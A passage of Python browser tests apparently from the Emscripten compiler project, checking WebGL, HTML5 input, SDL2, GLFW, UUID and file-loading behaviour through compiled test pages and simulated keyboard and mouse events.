args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args)
# This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles.
# Run interactive.test_cpuprofiler_memoryprofiler for interactive testing.
@requires_graphics_hardware
def test_cpuprofiler_memoryprofiler(self):
self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE'])
def test_uuid(self):
# Run with ./runner browser.test_uuid
# We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of
# high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available).
# First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that
# require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out.
self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid'])
test_js_closure = read_file('test.js')
# Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues"
assert ").randomBytes" in test_js_closure
assert "window.crypto.getRandomValues" in test_js_closure
out = self.run_js('test.js')
print(out)
# Tidy up files that might have been created by this test.
try_delete(test_file('uuid/test.js'))
try_delete(test_file('uuid/test.js.map'))
# Now run test in browser
self.btest_exit(test_file('uuid/test.c'), args=['-luuid'])
@requires_graphics_hardware
def test_glew(self):
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1')
self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1')
def test_doublestart_bug(self):
create_file('pre.js', r'''
if (!Module['preRun']) Module['preRun'] = [];
Module["preRun"].push(function () {
addRunDependency('test_run_dependency');
removeRunDependency('test_run_dependency');
});
''')
self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1')
@parameterized({
'': ([],),
'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],),
'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],),
'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],)
})
@requires_threads
def test_html5_core(self, opts):
if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts:
# In this mode an exception can be thrown by the browser, and we don't
# want the test to fail in that case so we override the error handling.
create_file('pre.js', '''
window.disableErrorReporting = true;
window.addEventListener('error', (event) => {
if (!event.message.includes('exception:fullscreen error')) {
report_error(event);
}
});
''')
self.emcc_args.append('--pre-js=pre.js')
self.btest(test_file('test_html5_core.c'), args=opts, expected='0')
@requires_threads
def test_html5_gamepad(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
print(opts)
self.btest_exit(test_file('test_gamepad.c'), args=[] + opts)
@requires_graphics_hardware
def test_html5_webgl_create_context_no_antialias(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_threads
@requires_graphics_hardware
def test_html5_webgl_create_context(self):
for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]:
print(opts)
self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL'])
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
def test_html5_webgl_create_context2(self):
self.btest_exit(test_file('webgl_create_context2.cpp'))
@requires_graphics_hardware
# Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it.
# (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode)
def test_html5_special_event_targets(self):
self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0')
@requires_graphics_hardware
def test_html5_webgl_destroy_context(self):
for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL'])
@no_chrome('see #7373')
@requires_graphics_hardware
def test_webgl_context_params(self):
if WINDOWS:
self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with')
self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL'])
# Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373)
@requires_graphics_hardware
def test_webgl_shader_source_length(self):
for opts in [[], ['-sFULL_ES2=1']]:
print(opts)
self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL'])
# Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL).
@requires_graphics_hardware
def test_webgl_unmasked_vendor_webgl(self):
self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL'])
@requires_graphics_hardware
def test_webgl2(self):
for opts in [
['-sMIN_CHROME_VERSION=0', '-Wno-transpile'],
['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'],
['-sFULL_ES2=1'],
]:
print(opts)
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts)
# Tests the WebGL 2 glGetBufferSubData() functionality.
@requires_graphics_hardware
def test_webgl2_get_buffer_sub_data(self):
self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
@requires_threads
def test_webgl2_pthreads(self):
# test that a program can be compiled with pthreads and render WebGL2 properly on the main thread
# (the testcase doesn't even use threads, but is compiled with thread support).
self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS'])
@requires_graphics_hardware
def test_webgl2_objects(self):
self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_html5_webgl_api(self):
for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],
[]]:
if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'):
continue
self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode)
@requires_graphics_hardware
def test_webgl2_ubos(self):
self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@requires_graphics_hardware
def test_webgl2_garbage_free_entrypoints(self):
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1'])
self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'))
@requires_graphics_hardware
def test_webgl2_backwards_compatibility_emulation(self):
self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1'])
@requires_graphics_hardware
def test_webgl2_runtime_no_context(self):
# tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists,
# but context creation fails, that we can then manually try to create a
# WebGL1 context and succeed.
self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl2_invalid_teximage2d_type(self):
self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2'])
@requires_graphics_hardware
def test_webgl_with_closure(self):
self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL'])
# Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types works
@requires_graphics_hardware
def test_webgl2_packed_types(self):
self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS'])
@requires_graphics_hardware
def test_webgl2_pbo(self):
self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'])
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mipmap(self):
self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'],
reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2)
@no_firefox('fails on CI likely due to GPU drivers there')
@requires_graphics_hardware
def test_webgl2_sokol_mrt(self):
self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'mrt-emcc.png'))
@requires_graphics_hardware
def test_webgl2_sokol_arraytex(self):
self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'],
reference=Path('third_party/sokol', 'arraytex-emsc.png'))
def test_sdl_touch(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0')
def test_html5_mouse(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0')
def test_sdl_mousewheel(self):
for opts in [[], ['-O2', '-g1', '--closure=1']]:
print(opts)
self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'])
def test_wget(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY'])
def test_wget_data(self):
create_file('test.txt', 'emscripten')
self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY'])
@parameterized({
'': ([],),
'es6': (['-sEXPORT_ES6=1'],),
})
def test_locate_file(self, args):
self.set_setting('EXIT_RUNTIME')
for wasm in [0, 1]:
self.clear()
create_file('src.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
int main() {
FILE *f = fopen("data.txt", "r");
assert(f && "could not open file");
char buf[100];
int num = fread(buf, 1, 20, f);
assert(num == 20 && "could not read 20 bytes");
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
assert(strcmp("load me right before", buf) == 0);
return 0;
}
''')
create_file('data.txt', 'load me right before...')
create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };')
self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w'))
# put pre.js first, then the file packager data, so locateFile is there for the file loading code
self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
ensure_dir('sub')
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
shutil.move('test.data', Path('sub/test.data'))
self.run_browser('page.html', None, '/report_result?exit:0')
# alternatively, put locateFile in the HTML
print('in html')
create_file('shell.html', '''
<body>
<script>
var Module = {
locateFile: function(x) { return "sub/" + x }
};
</script>
{{{ SCRIPT }}}
</body>
''')
def in_html(expected):
self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY)
if wasm:
shutil.move('page.wasm', Path('sub/page.wasm'))
else:
shutil.move('page.html.mem', Path('sub/page.html.mem'))
self.run_browser('page.html', None, '/report_result?exit:' + expected)
in_html('0')
# verify that the mem init request succeeded in the latter case
if not wasm:
create_file('src.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
int result = EM_ASM_INT({
return Module['memoryInitializerRequest'].status;
});
printf("memory init request: %d\n", result);
return result;
}
''')
in_html('200')
@requires_graphics_hardware
@parameterized({
'no_gl': (['-DCLIENT_API=GLFW_NO_API'],),
'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],)
})
def test_glfw3(self, args):
for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]:
print(opts)
self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1')
@requires_graphics_hardware
def test_glfw_events(self):
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1')
self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1')
@requires_graphics_hardware
def test_sdl2_image(self):
# load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
for mem in [0, 1]:
for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'),
('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]:
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem),
'--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_jpeg(self):
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg')
self.compile_btest([
test_file('sdl2_image.c'), '-o', 'page.html',
'--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins'
])
self.run_browser('page.html', '', '/report_result?600')
@requires_graphics_hardware
def test_sdl2_image_formats(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg')
self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"',
'-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]'])
self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"',
'-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]'])
def test_sdl2_key(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
var prevented = !document.dispatchEvent(event);
//send keypress if not prevented
if (!prevented) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one'])
self.run_browser('page.html', '', '/report_result?37182145')
def test_sdl2_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl2_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2'])
self.run_browser('page.html', '', '/report_result?1')
@requires_threads
def test_sdl2_threads(self):
self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD'])
@requires_graphics_hardware
def test_sdl2glshader(self):
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION'])
self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy
@requires_graphics_hardware
def test_sdl2_canvas_blank(self):
self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_palette(self):
self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_canvas_twice(self):
self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gfx(self):
self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2)
@requires_graphics_hardware
def test_sdl2_canvas_palette_2(self):
create_file('args-r.js', '''
Module['arguments'] = ['-r'];
''')
create_file('args-g.js', '''
Module['arguments'] = ['-g'];
''')
create_file('args-b.js', '''
Module['arguments'] = ['-b'];
''')
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js'])
self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js'])
def test_sdl2_swsurface(self):
self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB'])
@requires_graphics_hardware
def test_sdl2_image_prepare(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_image_prepare_data(self):
# load an image file, get pixel data.
shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not')
self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True)
@requires_graphics_hardware
def test_sdl2_canvas_proxy(self):
def post():
html = read_file('test.html')
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % read_file('reftest.js'))
create_file('test.html', html)
create_file('data.txt', 'datum')
self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post)
def test_sdl2_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2'])
def test_sdl2_timer(self):
self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2'])
def test_sdl2_canvas_size(self):
self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl2_glmatrixmode_texture(self):
self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='You should see a (top) red-white and (bottom) white-red image.')
@requires_graphics_hardware
def test_sdl2_gldrawelements(self):
self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.')
@requires_graphics_hardware
def test_sdl2_glclipplane_gllighting(self):
self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.')
@requires_graphics_hardware
def test_sdl2_glalphatest(self):
self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png',
args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'],
message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.')
@requires_graphics_hardware
def test_sdl2_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl2_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'],
message='You should see an image with fog.')
def test_sdl2_unwasteful(self):
self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1'])
def test_sdl2_canvas_write(self):
self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2'])
@requires_graphics_hardware
def test_sdl2_gl_frames_swap(self):
def post_build(*args):
self.post_manual_reftest(*args)
html = read_file('test.html')
html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame
assert html != html2
create_file('test.html', html2)
self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, post_build=post_build)
@requires_graphics_hardware
def test_sdl2_ttf(self):
shutil.copy2(test_file('freetype/LiberationSansBold.ttf'), self.get_dir())
self.btest('sdl2_ttf.c', reference='sdl2_ttf.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'LiberationSansBold.ttf'],
message='You should see colorful "hello" and "world" in the window')
@requires_graphics_hardware
def test_sdl2_ttf_rtl(self):
shutil.copy2(test_file('third_party/notofont/NotoNaskhArabic-Regular.ttf'), self.get_dir())
self.btest('sdl2_ttf_rtl.c', reference='sdl2_ttf_rtl.png',
args=['-O2', '-sUSE_SDL=2', '-sUSE_SDL_TTF=2', '--embed-file', 'NotoNaskhArabic-Regular.ttf'],
message='You should see colorful "سلام" and "جهان" with shaped Arabic script in the window')
def test_sdl2_custom_cursor(self):
shutil.copyfile(test_file('cursor.bmp'), 'cursor.bmp')
self.btest('sdl2_custom_cursor.c', expected='1', args=['--preload-file', 'cursor.bmp', '-sUSE_SDL=2'])
